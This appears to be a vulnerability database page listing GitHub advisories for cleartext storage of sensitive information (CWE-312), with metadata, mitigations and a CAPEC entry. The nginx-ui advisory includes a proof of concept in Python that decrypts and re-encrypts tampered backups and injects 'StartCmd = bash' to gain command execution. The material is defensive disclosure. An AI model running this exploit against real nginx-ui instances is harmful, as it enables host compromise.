CWE-312
AllowedCleartext Storage of Sensitive Information
Abstraction: Base · Status: Draft
The product stores sensitive information in cleartext within a resource that might be accessible to another control sphere.
1017 vulnerabilities reference this CWE, most recent first.
GHSA-FCH8-H9XW-98MW
Vulnerability from github – Published: 2025-02-06 06:31 – Updated: 2025-02-06 06:31IBM ApplinX 11.1 stores sensitive information in cleartext in memory that could be obtained by an authenticated user.
{
"affected": [],
"aliases": [
"CVE-2024-49800"
],
"database_specific": {
"cwe_ids": [
"CWE-312",
"CWE-316"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-06T00:15:27Z",
"severity": "MODERATE"
},
"details": "IBM ApplinX 11.1 stores sensitive information in cleartext in memory that could be obtained by an authenticated user.",
"id": "GHSA-fch8-h9xw-98mw",
"modified": "2025-02-06T06:31:26Z",
"published": "2025-02-06T06:31:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49800"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7182522"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FFX9-RF8P-2PX9
Vulnerability from github – Published: 2023-03-01 21:30 – Updated: 2023-03-09 03:30An information disclosure vulnerability allows sensitive key material to be included in technical support archives in Sophos Connect versions older than 2.2.90.
{
"affected": [],
"aliases": [
"CVE-2022-48310"
],
"database_specific": {
"cwe_ids": [
"CWE-312"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-01T19:15:00Z",
"severity": "MODERATE"
},
"details": "An information disclosure vulnerability allows sensitive key material to be included in technical support archives in Sophos Connect versions older than 2.2.90.",
"id": "GHSA-ffx9-rf8p-2px9",
"modified": "2023-03-09T03:30:15Z",
"published": "2023-03-01T21:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48310"
},
{
"type": "WEB",
"url": "https://www.sophos.com/en-us/security-advisories/sophos-sa-20230301-scc-csrf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FHH2-GG7W-GWPQ
Vulnerability from github – Published: 2026-03-30 16:23 – Updated: 2026-07-06 19:35Summary
The nginx-ui backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.
Details
The backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (hash_info.txt) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.
Because the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.
The backup system is built around the following workflow:
- Backup files are compressed into
nginx-ui.zipandnginx.zip. - The files are encrypted using AES-256-CBC.
- SHA-256 hashes of the encrypted files are stored in
hash_info.txt. - The hash file is also encrypted with the same AES key and IV.
- The AES key and IV are provided to the client as a "backup security token".
This architecture creates a circular trust model:
- The encryption key is available to the client.
- The integrity metadata is encrypted with that same key.
- The restore process trusts hashes contained within the backup itself.
Because the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.
Environment
- OS: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)
- Application Version: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)
- Deployment: Docker Container default installation
- Relevant Source Files:
backup_crypto.gobackup.gorestore.goSystemRestoreContent.vue
PoC
-
Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the
.keyfile. -
Decrypt the
nginx-ui.ziparchive using the obtained token.
import base64
import os
import sys
import zipfile
from io import BytesIO
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
def decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -> bytes:
key = base64.b64decode(key_b64)
iv = base64.b64decode(iv_b64)
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(encrypted_data)
return unpad(decrypted, AES.block_size)
def process_local_backup(file_path, token, output_dir):
key_b64, iv_b64 = token.split(":")
os.makedirs(output_dir, exist_ok=True)
print(f"[*] File processing: {file_path}")
with zipfile.ZipFile(file_path, 'r') as main_zip:
main_zip.extractall(output_dir)
files_to_decrypt = ["hash_info.txt", "nginx-ui.zip", "nginx.zip"]
for filename in files_to_decrypt:
path = os.path.join(output_dir, filename)
if os.path.exists(path):
with open(path, "rb") as f:
encrypted = f.read()
decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)
out_path = path + ".decrypted"
with open(out_path, "wb") as f:
f.write(decrypted)
print(f"[*] Successfully decrypted: {out_path}")
# Manual config
BACKUP_FILE = "backup-20260314-151959.zip"
TOKEN = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
OUTPUT = "decrypted"
if __name__ == "__main__":
process_local_backup(BACKUP_FILE, TOKEN, OUTPUT)
- Modify the contained
app.inito inject malicious configuration (e.g.,StartCmd = bash). - Re-compress the files and calculate the new SHA-256 hash.
- Update
hash_info.txtwith the new, legitimate-looking hashes for the modified files. - Encrypt the bundle again using the original Key and IV.
import base64
import hashlib
import os
import zipfile
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
def encrypt_file(data, key_b64, iv_b64):
key = base64.b64decode(key_b64)
iv = base64.b64decode(iv_b64)
cipher = AES.new(key, AES.MODE_CBC, iv)
return cipher.encrypt(pad(data, AES.block_size))
def build_rebuilt_backup(files, token, output_filename="backup_rebuild.zip"):
key_b64, iv_b64 = token.split(":")
encrypted_blobs = {}
for fname in files:
with open(fname, "rb") as f:
data = f.read()
blob = encrypt_file(data, key_b64, iv_b64)
target_name = fname.replace(".decrypted", "")
encrypted_blobs[target_name] = blob
print(f"[*] Cipher {target_name}: {len(blob)} bytes")
hash_content = ""
for name, blob in encrypted_blobs.items():
h = hashlib.sha256(blob).hexdigest()
hash_content += f"{name}: {h}\n"
encrypted_hash_info = encrypt_file(hash_content.encode(), key_b64, iv_b64)
encrypted_blobs["hash_info.txt"] = encrypted_hash_info
with zipfile.ZipFile(output_filename, 'w', compression=zipfile.ZIP_DEFLATED) as zf:
for name, blob in encrypted_blobs.items():
zf.writestr(name, blob)
print(f"\n[*] Backup rebuild: {output_filename}")
print(f"[*] Verificando integridad...")
TOKEN = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
FILES = ["nginx-ui.zip.decrypted", "nginx.zip.decrypted"]
if __name__ == "__main__":
build_rebuilt_backup(FILES, TOKEN)
-
Upload the tampered backup to the
nginx-uirestore interface. -
Observation: The system accepts the modified backup. Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host.
Impact
An attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.
Potential impacts include:
- Persistent configuration tampering
- Backdoor insertion into nginx configuration
- Execution of attacker-controlled commands depending on configuration settings
- Full compromise of the nginx-ui instance
The severity depends on the restore permissions and deployment configuration.
Recommended Mitigation
- Introduce a trusted integrity root Integrity metadata must not be derived solely from data contained in the backup. Possible solutions include:
- Signing backup metadata using a server-side private key
-
Storing integrity metadata separately from the backup archive
-
Enforce integrity verification The restore operation must abort if hash verification fails.
-
Avoid circular trust models If encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.
-
Optional cryptographic improvements While not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret.
This vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.
Regression
The previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.
The backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.
As a result, the fundamental integrity weakness remains exploitable even after the previous fix.
A patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/0xJacky/Nginx-UI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.10-0.20260315015203-f61bcec547c0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33026"
],
"database_specific": {
"cwe_ids": [
"CWE-312",
"CWE-347",
"CWE-354"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-30T16:23:34Z",
"nvd_published_at": "2026-03-30T20:16:22Z",
"severity": "CRITICAL"
},
"details": "## Summary\nThe `nginx-ui` backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.\n\n## Details\nThe backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (`hash_info.txt`) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.\n\nBecause the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.\n\nThe backup system is built around the following workflow:\n\n1. Backup files are compressed into `nginx-ui.zip` and `nginx.zip`.\n2. The files are encrypted using AES-256-CBC.\n3. SHA-256 hashes of the encrypted files are stored in `hash_info.txt`.\n4. The hash file is also encrypted with the same AES key and IV.\n5. The AES key and IV are provided to the client as a \"backup security token\".\n\nThis architecture creates a circular trust model:\n\n- The encryption key is available to the client.\n- The integrity metadata is encrypted with that same key.\n- The restore process trusts hashes contained within the backup itself.\n\nBecause the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.\n\n### Environment\n- **OS**: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)\n- **Application Version**: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)\n- **Deployment**: Docker Container default installation\n- **Relevant Source Files**:\n - `backup_crypto.go`\n - `backup.go`\n - `restore.go`\n - `SystemRestoreContent.vue`\n\n\n## PoC\n1. Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the `.key` file.\n \u003cimg width=\"1483\" height=\"586\" alt=\"image\" src=\"https://github.com/user-attachments/assets/857a1b3f-ce66-4929-a165-2f28393df17f\" /\u003e\n\n2. Decrypt the `nginx-ui.zip` archive using the obtained token.\n``` \nimport base64\nimport os\nimport sys\nimport zipfile\nfrom io import BytesIO\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\n\ndef decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -\u003e bytes:\n key = base64.b64decode(key_b64)\n iv = base64.b64decode(iv_b64)\n \n cipher = AES.new(key, AES.MODE_CBC, iv)\n decrypted = cipher.decrypt(encrypted_data)\n return unpad(decrypted, AES.block_size)\n\ndef process_local_backup(file_path, token, output_dir):\n key_b64, iv_b64 = token.split(\":\")\n os.makedirs(output_dir, exist_ok=True)\n print(f\"[*] File processing: {file_path}\")\n \n with zipfile.ZipFile(file_path, \u0027r\u0027) as main_zip:\n main_zip.extractall(output_dir)\n \n files_to_decrypt = [\"hash_info.txt\", \"nginx-ui.zip\", \"nginx.zip\"]\n \n for filename in files_to_decrypt:\n path = os.path.join(output_dir, filename)\n if os.path.exists(path):\n with open(path, \"rb\") as f:\n encrypted = f.read()\n \n decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)\n \n out_path = path + \".decrypted\"\n with open(out_path, \"wb\") as f:\n f.write(decrypted)\n print(f\"[*] Successfully decrypted: {out_path}\")\n\n# Manual config\nBACKUP_FILE = \"backup-20260314-151959.zip\" \nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nOUTPUT = \"decrypted\"\n\nif __name__ == \"__main__\":\n process_local_backup(BACKUP_FILE, TOKEN, OUTPUT)\n```\n\n3. Modify the contained `app.ini` to inject malicious configuration (e.g., `StartCmd = bash`).\n4. Re-compress the files and calculate the new SHA-256 hash.\n5. Update `hash_info.txt` with the new, legitimate-looking hashes for the modified files.\n6. Encrypt the bundle again using the original Key and IV.\n```\nimport base64\nimport hashlib\nimport os\nimport zipfile\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\n\ndef encrypt_file(data, key_b64, iv_b64):\n key = base64.b64decode(key_b64)\n iv = base64.b64decode(iv_b64)\n cipher = AES.new(key, AES.MODE_CBC, iv)\n return cipher.encrypt(pad(data, AES.block_size))\n\ndef build_rebuilt_backup(files, token, output_filename=\"backup_rebuild.zip\"):\n key_b64, iv_b64 = token.split(\":\")\n \n encrypted_blobs = {}\n for fname in files:\n with open(fname, \"rb\") as f:\n data = f.read()\n \n blob = encrypt_file(data, key_b64, iv_b64)\n\n target_name = fname.replace(\".decrypted\", \"\")\n encrypted_blobs[target_name] = blob\n print(f\"[*] Cipher {target_name}: {len(blob)} bytes\")\n\n hash_content = \"\"\n for name, blob in encrypted_blobs.items():\n h = hashlib.sha256(blob).hexdigest()\n hash_content += f\"{name}: {h}\\n\"\n \n encrypted_hash_info = encrypt_file(hash_content.encode(), key_b64, iv_b64)\n encrypted_blobs[\"hash_info.txt\"] = encrypted_hash_info\n\n with zipfile.ZipFile(output_filename, \u0027w\u0027, compression=zipfile.ZIP_DEFLATED) as zf:\n for name, blob in encrypted_blobs.items():\n zf.writestr(name, blob)\n \n print(f\"\\n[*] Backup rebuild: {output_filename}\")\n print(f\"[*] Verificando integridad...\")\n\nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nFILES = [\"nginx-ui.zip.decrypted\", \"nginx.zip.decrypted\"]\n\nif __name__ == \"__main__\":\n build_rebuilt_backup(FILES, TOKEN)\n```\n7. Upload the tampered backup to the `nginx-ui` restore interface.\n \u003cimg width=\"1059\" height=\"290\" alt=\"image\" src=\"https://github.com/user-attachments/assets/66872685-b85b-4c81-ae24-13c811acba9a\" /\u003e\n\n\n8. **Observation**: The system accepts the modified backup. Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host.\n \u003cimg width=\"1316\" height=\"627\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2752749e-ac39-4d60-88ca-5058b8e840a6\" /\u003e\n\n\n\n## Impact\nAn attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.\n\nPotential impacts include:\n\n- Persistent configuration tampering\n- Backdoor insertion into nginx configuration\n- Execution of attacker-controlled commands depending on configuration settings\n- Full compromise of the nginx-ui instance\n\nThe severity depends on the restore permissions and deployment configuration.\n\n## Recommended Mitigation\n\n1. **Introduce a trusted integrity root**\nIntegrity metadata must not be derived solely from data contained in the backup. Possible solutions include:\n - Signing backup metadata using a server-side private key\n - Storing integrity metadata separately from the backup archive\n\n2. **Enforce integrity verification**\nThe restore operation must abort if hash verification fails.\n\n3. **Avoid circular trust models**\nIf encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.\n\n4. **Optional cryptographic improvements**\nWhile not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret.\n\nThis vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.\n\n## Regression\n\nThe previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.\n\nThe backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.\n\nAs a result, the fundamental integrity weakness remains exploitable even after the previous fix.\n\nA patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.",
"id": "GHSA-fhh2-gg7w-gwpq",
"modified": "2026-07-06T19:35:49Z",
"published": "2026-03-30T16:23:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-fhh2-gg7w-gwpq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33026"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/commit/f61bcec547c0f305e35348d6440ef156c1d5c3cb"
},
{
"type": "PACKAGE",
"url": "https://github.com/0xJacky/nginx-ui"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-g9w5-qffc-6762"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2026-4903"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "nginx-ui Backup Restore Allows Tampering with Encrypted Backups"
}
GHSA-FHMQ-3V4X-2V22
Vulnerability from github – Published: 2022-05-24 19:19 – Updated: 2022-05-24 19:19Couchbase Server before 6.6.3 and 7.x before 7.0.2 stores Sensitive Information in Cleartext. The issue occurs when the cluster manager forwards a HTTP request from the pluggable UI (query workbench etc) to the specific service. In the backtrace, the Basic Auth Header included in the HTTP request, has the "@" user credentials of the node processing the UI request.
{
"affected": [],
"aliases": [
"CVE-2021-42763"
],
"database_specific": {
"cwe_ids": [
"CWE-312"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-11-02T12:15:00Z",
"severity": "HIGH"
},
"details": "Couchbase Server before 6.6.3 and 7.x before 7.0.2 stores Sensitive Information in Cleartext. The issue occurs when the cluster manager forwards a HTTP request from the pluggable UI (query workbench etc) to the specific service. In the backtrace, the Basic Auth Header included in the HTTP request, has the \"@\" user credentials of the node processing the UI request.",
"id": "GHSA-fhmq-3v4x-2v22",
"modified": "2022-05-24T19:19:28Z",
"published": "2022-05-24T19:19:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42763"
},
{
"type": "WEB",
"url": "https://docs.couchbase.com/server/current/release-notes/relnotes.html"
},
{
"type": "WEB",
"url": "https://www.couchbase.com/alerts"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-FJ3X-FPPX-2J7W
Vulnerability from github – Published: 2022-05-24 17:19 – Updated: 2024-04-04 02:51D-Link DIR-865L Ax 1.20B01 Beta devices have Cleartext Storage of Sensitive Information.
{
"affected": [],
"aliases": [
"CVE-2020-13783"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-312"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-06-03T17:15:00Z",
"severity": "HIGH"
},
"details": "D-Link DIR-865L Ax 1.20B01 Beta devices have Cleartext Storage of Sensitive Information.",
"id": "GHSA-fj3x-fppx-2j7w",
"modified": "2024-04-04T02:51:19Z",
"published": "2022-05-24T17:19:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13783"
},
{
"type": "WEB",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10174"
},
{
"type": "WEB",
"url": "https://unit42.paloaltonetworks.com/6-new-d-link-vulnerabilities-found-on-home-routers"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FJ44-H6XW-896G
Vulnerability from github – Published: 2025-06-09 18:32 – Updated: 2025-07-02 19:46react-native-keys 0.7.11 is vulnerable to sensitive information disclosure (remote) as encryption cipher and Base64 chunks are stored as plaintext in the compiled native binary. Attackers can extract these secrets using basic static analysis tools.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "react-native-keys"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.7.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-45001"
],
"database_specific": {
"cwe_ids": [
"CWE-312"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-02T19:46:05Z",
"nvd_published_at": "2025-06-09T17:15:29Z",
"severity": "HIGH"
},
"details": "react-native-keys 0.7.11 is vulnerable to sensitive information disclosure (remote) as encryption cipher and Base64 chunks are stored as plaintext in the compiled native binary. Attackers can extract these secrets using basic static analysis tools.",
"id": "GHSA-fj44-h6xw-896g",
"modified": "2025-07-02T19:46:05Z",
"published": "2025-06-09T18:32:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45001"
},
{
"type": "WEB",
"url": "https://gist.github.com/ch3tanbug/44aedff79dd5d2d6beadbffcd01e0de5"
},
{
"type": "WEB",
"url": "https://github.com/ch3tanbug/vulnerability-research/tree/main/CVE-2025-45001"
},
{
"type": "PACKAGE",
"url": "https://github.com/numandev1/react-native-keys"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "react-native-keys insecurely stores encryption cipher and Base64 chunks"
}
GHSA-FM8C-G4FR-MJ3J
Vulnerability from github – Published: 2023-04-12 18:30 – Updated: 2024-04-04 03:25A vulnerability in Palo Alto Networks PAN-OS software enables an authenticated administrator to expose the plaintext values of secrets stored in the device configuration and encrypted API keys.
{
"affected": [],
"aliases": [
"CVE-2023-0005"
],
"database_specific": {
"cwe_ids": [
"CWE-312",
"CWE-497"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-04-12T17:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability in Palo Alto Networks PAN-OS software enables an authenticated administrator to expose the plaintext values of secrets stored in the device configuration and encrypted API keys.",
"id": "GHSA-fm8c-g4fr-mj3j",
"modified": "2024-04-04T03:25:28Z",
"published": "2023-04-12T18:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0005"
},
{
"type": "WEB",
"url": "https://security.paloaltonetworks.com/CVE-2023-0005"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FP45-3GJM-CWRM
Vulnerability from github – Published: 2022-05-13 01:22 – Updated: 2022-05-13 01:22An exposed debugging endpoint in the browser in Google Chrome on Android prior to 72.0.3626.81 allowed a local attacker to obtain potentially sensitive information from process memory via a crafted Intent.
{
"affected": [],
"aliases": [
"CVE-2019-5765"
],
"database_specific": {
"cwe_ids": [
"CWE-312"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-02-19T17:29:00Z",
"severity": "MODERATE"
},
"details": "An exposed debugging endpoint in the browser in Google Chrome on Android prior to 72.0.3626.81 allowed a local attacker to obtain potentially sensitive information from process memory via a crafted Intent.",
"id": "GHSA-fp45-3gjm-cwrm",
"modified": "2022-05-13T01:22:33Z",
"published": "2022-05-13T01:22:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5765"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2019:0309"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2019/01/stable-channel-update-for-desktop.html"
},
{
"type": "WEB",
"url": "https://crbug.com/922627"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JVFHYCJGMZQUKYSIE2BXE4NLEGFGUXU5"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQOP53LXXPRGD4N5OBKGQTSMFXT32LF6"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2019/dsa-4395"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/106767"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FP5J-3FPF-MHJ5
Vulnerability from github – Published: 2019-08-08 15:18 – Updated: 2024-10-24 21:48Prior to Spark 2.3.3, in certain situations Spark would write user data to local disk unencrypted, even if spark.io.encryption.enabled=true. This includes cached blocks that are fetched to disk (controlled by spark.maxRemoteBlockSizeFetchToMem); in SparkR, using parallelize; in Pyspark, using broadcast and parallelize; and use of python udfs.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.spark:spark-core_2.11"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "pyspark"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-10099"
],
"database_specific": {
"cwe_ids": [
"CWE-312"
],
"github_reviewed": true,
"github_reviewed_at": "2019-08-08T15:16:27Z",
"nvd_published_at": "2019-08-07T17:15:00Z",
"severity": "HIGH"
},
"details": "Prior to Spark 2.3.3, in certain situations Spark would write user data to local disk unencrypted, even if spark.io.encryption.enabled=true. This includes cached blocks that are fetched to disk (controlled by spark.maxRemoteBlockSizeFetchToMem); in SparkR, using parallelize; in Pyspark, using broadcast and parallelize; and use of python udfs.",
"id": "GHSA-fp5j-3fpf-mhj5",
"modified": "2024-10-24T21:48:36Z",
"published": "2019-08-08T15:18:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10099"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyspark/PYSEC-2019-114.yaml"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/c2a39c207421797f82823a8aff488dcd332d9544038307bf69a2ba9e@%3Cuser.spark.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/ra216b7b0dd82a2c12c2df9d6095e689eb3f3d28164e6b6587da69fae@%3Ccommits.spark.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rabe1d47e2bf8b8f6d9f3068c8d2679731d57fa73b3a7ed1fa82406d2@%3Cissues.spark.apache.org%3E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Sensitive data written to disk unencrypted in Spark"
}
GHSA-FPGR-P888-F8J7
Vulnerability from github – Published: 2022-05-24 17:49 – Updated: 2024-04-04 03:06Etherpad <1.8.3 stored passwords used by users insecurely in the database and in log files. This affects every database backend supported by Etherpad.
{
"affected": [],
"aliases": [
"CVE-2020-22783"
],
"database_specific": {
"cwe_ids": [
"CWE-312"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-28T21:15:00Z",
"severity": "MODERATE"
},
"details": "Etherpad \u003c1.8.3 stored passwords used by users insecurely in the database and in log files. This affects every database backend supported by Etherpad.",
"id": "GHSA-fpgr-p888-f8j7",
"modified": "2024-04-04T03:06:41Z",
"published": "2022-05-24T17:49:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22783"
},
{
"type": "WEB",
"url": "https://github.com/ether/etherpad-lite/issues/3421"
},
{
"type": "WEB",
"url": "https://github.com/ether/etherpad-lite/commit/53f126082a8b3d094e48b159f0f0bc8a5db4b2f4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to encrypt the data at rest. [REF-1297] [REF-1299] [REF-1301]
Mitigation
In some systems/environments such as cloud, the use of "double encryption" (at both the software and hardware layer) might be required, and the developer might be solely responsible for both layers, instead of shared responsibility with the administrator of the broader system/environment.
CAPEC-37: Retrieve Embedded Sensitive Data
An attacker examines a target system to find sensitive data that has been embedded within it. This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.